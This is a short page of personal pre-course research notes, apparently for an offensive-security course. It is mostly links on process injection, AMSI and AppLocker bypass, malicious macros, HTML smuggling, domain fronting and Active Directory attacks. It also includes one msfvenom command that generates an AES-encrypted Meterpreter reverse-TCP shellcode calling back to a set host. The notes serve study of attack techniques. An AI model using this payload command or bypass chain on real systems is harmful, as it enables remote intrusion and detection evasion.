Just a place to store some of my pre-course research notes.
https://rastamouse.me/blog/process-injection-dinvoke/
https://en.wikipedia.org/wiki/Windows_Registry
https://www.lifewire.com/windows-registry-2625992
https://buffered.io/posts/staged-vs-stageless-handlers/
https://en.wikipedia.org/wiki/Dropper_(malware)
https://rastamouse.me/blog/asb-bypass-pt2/
https://outflank.nl/blog/2018/08/14/html-smuggling-explained/
https://github.com/Arno0x/EmbedInHTML
https://digitalguardian.com/blog/what-macro-malware
https://stackoverflow.com/questions/51296291/auto-open-sub-vba/51296480
https://github.com/Arno0x/EmbedInHTML
https://github.com/L4bF0x/PhishingPretexts
https://www.aeternus.sg/how-to-use-windows-api-in-vba/
https://renenyffenegger.ch/notes/development/languages/VBA/Win-API/index
https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
https://github.com/infosecn1nja/MaliciousMacroMSBuild
https://devblogs.microsoft.com/scripting/use-powershell-to-interact-with-the-windows-api-part-1/
https://www.raydbg.com/2017/Call-Native-Win32-API-in-PowerShell/
https://powersploit.readthedocs.io/en/latest/CodeExecution/Invoke-ReflectivePEInjection/
https://stackoverflow.com/questions/63593930/how-to-call-a-win32-api-function-from-powershell
https://isc.sans.edu/forums/diary/Fileless+Malicious+PowerShell+Sample/23081/
https://www.powershellgallery.com/packages/poke/1.0.0.2/Content/delegate.ps1
http://woshub.com/using-powershell-behind-a-proxy/
https://stackoverflow.com/questions/14263359/access-web-using-powershell-and-proxy
https://cloudrun.co.uk/powershell/configuring-powershell-to-work-behind-a-proxy-server/
https://medium.com/river-yang/powershell-working-behind-a-proxy-with-authentication-eb68a337f222
https://docs.microsoft.com/en-us/previous-versions/windows/desktop/indexsrv/running-a-jscript-query
https://github.com/hlldz/SpookFlare
https://github.com/tyranid/DotNetToJScript
https://github.com/med0x2e/GadgetToJScript
https://github.com/mdsecactivebreach/SharpShooter
https://github.com/3xpl01tc0d3r/ProcessInjection
https://github.com/secrary/InjectProc
https://rastamouse.me/blog/process-injection-dinvoke/
https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing
https://medium.com/bug-bounty-hunting/dll-injection-attacks-in-a-nutshell-71bc84ac59bd
http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
https://github.com/fdiskyou/injectAllTheThings
https://github.com/stephenfewer/ReflectiveDLLInjection
https://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
https://gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
https://github.com/caesartcs/ProcessHollowing
https://github.com/m0n0ph1/Process-Hollowing
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.112 LPORT=9999 -f csharp --encrypt aes256 --encrypt-key 12345678901234567890123456789012 --encrypt-iv 1234567890123456
(Encryption Key must be 32 bytes) (Encryption IV must be 16 bytes)
$ msfvenom --list encrypt
Framework Encryption Formats [--encrypt <value>]
================================================
Name
----
aes256
base64
rc4
xor
https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/
https://github.com/cribdragg3r/Simple-Loader
https://rastamouse.me/blog/asb-bypass-pt2/
https://rastamouse.me/blog/asb-bypass-pt3/
https://rastamouse.me/blog/asb-bypass-pt4/
https://github.com/api0cradle/UltimateAppLockerByPassList
https://github.com/0xVIC/myAPPLockerBypassSummary
https://digi.ninja/blog/domain_fronting.php
https://attack.mitre.org/techniques/T1090/004/
https://medium.com/@malcomvetter/simplifying-domain-fronting-8d23dcb694a0
https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling
https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
https://www.boiteaklou.fr/Abusing-Shared-Libraries.html
https://sumit-ghosh.com/articles/hijacking-library-functions-code-injection-ld-preload/
https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/
https://sra.io/blog/sitekiosk-breakout/
https://www.engetsu-consulting.com/blog/kiosk-breakout-windows
https://rastamouse.me/blog/laps-pt1/
https://rastamouse.me/blog/laps-pt2/
https://github.com/kfosaaen/Get-LAPSPasswords
https://blog.netspi.com/running-laps-around-cleartext-passwords/
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
https://www.mssqltips.com/sqlservertip/4181/inventory-sql-logins-on-a-sql-server-with-powershell/
https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e
https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/
https://hackingandsecurity.blogspot.com/2017/07/10-places-to-stick-your-unc-path.html
https://github.com/BloodHoundAD/BloodHound
https://github.com/BloodHoundAD/SharpHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/AzureHound.ps1
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
https://github.com/fox-it/BloodHound.py
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
https://www.qomplx.com/qomplx-knowledge-kerberos-delegation-attacks-explained/
https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/
https://adsecurity.org/?p=1588
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet